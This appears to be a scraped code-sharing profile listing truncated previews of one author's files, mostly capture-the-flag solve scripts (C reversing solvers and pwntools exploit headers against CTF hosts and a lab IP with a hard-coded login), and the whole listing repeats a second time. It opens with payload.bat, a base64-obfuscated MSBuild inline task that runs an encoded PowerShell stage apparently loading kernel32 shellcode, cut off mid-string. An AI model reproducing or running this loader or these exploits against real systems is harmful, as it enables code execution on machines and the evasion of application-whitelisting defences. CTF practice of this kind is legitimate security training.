Alejandro Taibo KaoRz

## payload.bat
@echo off
echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPjxUYXJnZXQgTmFtZT0ibnBzY3NoYXJwIj48bnBzIC8+PC9UYXJnZXQ+PFVzaW5nVGFzayBUYXNrTmFtZT0ibnBzIiBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5IiBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID48VGFzaz48UmVmZXJlbmNlIEluY2x1ZGU9IlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24iIC8+PENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+PCFbQ0RBVEFbdXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDt1c2luZyBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uO3VzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzO3VzaW5nIE1pY3Jvc29mdC5CdWlsZC5GcmFtZXdvcms7dXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllcztwdWJsaWMgY2xhc3MgbnBzIDogVGFzaywgSVRhc2t7cHVibGljIG92ZXJyaWRlIGJvb2wgRXhlY3V0ZSgpe3N0cmluZyBjbWQgPSAiSkZWc1EzUlpXVTEzY1NBOUlFQWlEUXBiUkd4c1NXMXdiM0owS0NKclpYSnVaV3d6TWk1a2JHd2lLVjBOQ25CMVlteHBZeUJ6ZEdGMGFXTWdaWGgwWlhKdUlFbHVkRkIwY2lCV2FYSjBkV0ZzU

## main.c
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include "solver.h"

char *msg = "secadmin{THISISATESTX}";				// The flag has "secadmin{}" format (22 chars)
char j[64];							// .bss:0000000000004160 ; char j[64]
int tiempo = 0;							// .bss:000000000000414C tiempo

## solve_rev4.c
#include <stdio.h>
#include <stdlib.h>

const char xored[] = {0x0D, 0x3C, 0x0F, 0x48, 0x1E, 0x57, 0x30};

int testit(char *key) {

	int v6 = 0;
	int v7 = 0;
	int i;

## solve_rev3.c
#include <stdio.h>

void main() {

	char x[] = {0x68, 0x6F, 0x6F, 0x65, 0x79, 0x5F, 0x63, 0x6F, 0x6F};
	char y[] = {0x0B, 0X00, 0x00, 0x09, 0x03, 0x00, 0x1B, 0x00, 0x1D};
	char z[10];

	int i;
	char word, test;

## santas_lucky_number.py
import urllib2

def request(number):
    url = 'http://199.247.6.180:12005/?page=' + str(number)
    request = urllib2.Request(url)
    response = urllib2.urlopen(request)
    body = response.read()

    return body.split("\n")[len(body.split("\n")) - 2][:-4]

## random_present.py
from pwn import *

context(os = "linux", arch = "amd64")
# context.log_level = 'DEBUG'
context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./chall')
libc = ELF('./libc6_2.19-0ubuntu6.14_amd64.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process(elf.path)

## toctou.py
#!/usr/bin/python

import threading
import os
import requests

url = 'http://ctf.alphasec.xyz:5000/'
headers = {
            'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

## armoury.py
from pwn import *

HOST = "159.89.166.12"
PORT = 16000

context(os = "linux", arch = "amd64")
# context.log_level = 'DEBUG'

elf = ELF("./armoury")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

## tweetdb.py
from pwn import *

elf  = ELF('./tweetdb')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
local = False

HOST = 'challenges.hackplayers.com'
PORT = 1337

# context.terminal = ['tmux', 'sp', '-h']

## xpl.py
import os, sys
from pwn import *

HOST = '10.10.10.139'
USER = 'margo'
PASS = 'iamgod$08'
LOCAL = False

elf  = ELF('./garbage')
	#include <stdio.h>
	#include <unistd.h>
	#include <pthread.h>
	#include <string.h>
	#include "solver.h"

	char *msg = "secadmin{THISISATESTX}"; // The flag has "secadmin{}" format (22 chars)
	char j[64]; // .bss:0000000000004160 ; char j[64]
	int tiempo = 0; // .bss:000000000000414C tiempo
	#include <stdio.h>
	#include <stdlib.h>

	const char xored[] = {0x0D, 0x3C, 0x0F, 0x48, 0x1E, 0x57, 0x30};

	int testit(char *key) {

	int v6 = 0;
	int v7 = 0;
	int i;
	#include <stdio.h>

	void main() {

	char x[] = {0x68, 0x6F, 0x6F, 0x65, 0x79, 0x5F, 0x63, 0x6F, 0x6F};
	char y[] = {0x0B, 0X00, 0x00, 0x09, 0x03, 0x00, 0x1B, 0x00, 0x1D};
	char z[10];

	int i;
	char word, test;
	import urllib2

	def request(number):
	url = 'http://199.247.6.180:12005/?page=' + str(number)
	request = urllib2.Request(url)
	response = urllib2.urlopen(request)
	body = response.read()

	return body.split("\n")[len(body.split("\n")) - 2][:-4]
	from pwn import *

	context(os = "linux", arch = "amd64")
	# context.log_level = 'DEBUG'
	context.terminal = ['tmux', 'splitw', '-h']

	elf = ELF('./chall')
	libc = ELF('./libc6_2.19-0ubuntu6.14_amd64.so')
	# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	# p = process(elf.path)
	#!/usr/bin/python

	import threading
	import os
	import requests

	url = 'http://ctf.alphasec.xyz:5000/'
	headers = {
	'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
	'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',
	from pwn import *

	HOST = "159.89.166.12"
	PORT = 16000

	context(os = "linux", arch = "amd64")
	# context.log_level = 'DEBUG'

	elf = ELF("./armoury")
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	from pwn import *

	elf = ELF('./tweetdb')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
	local = False

	HOST = 'challenges.hackplayers.com'
	PORT = 1337

	# context.terminal = ['tmux', 'sp', '-h']
	import os, sys
	from pwn import *

	HOST = '10.10.10.139'
	USER = 'margo'
	PASS = 'iamgod$08'
	LOCAL = False

	elf = ELF('./garbage')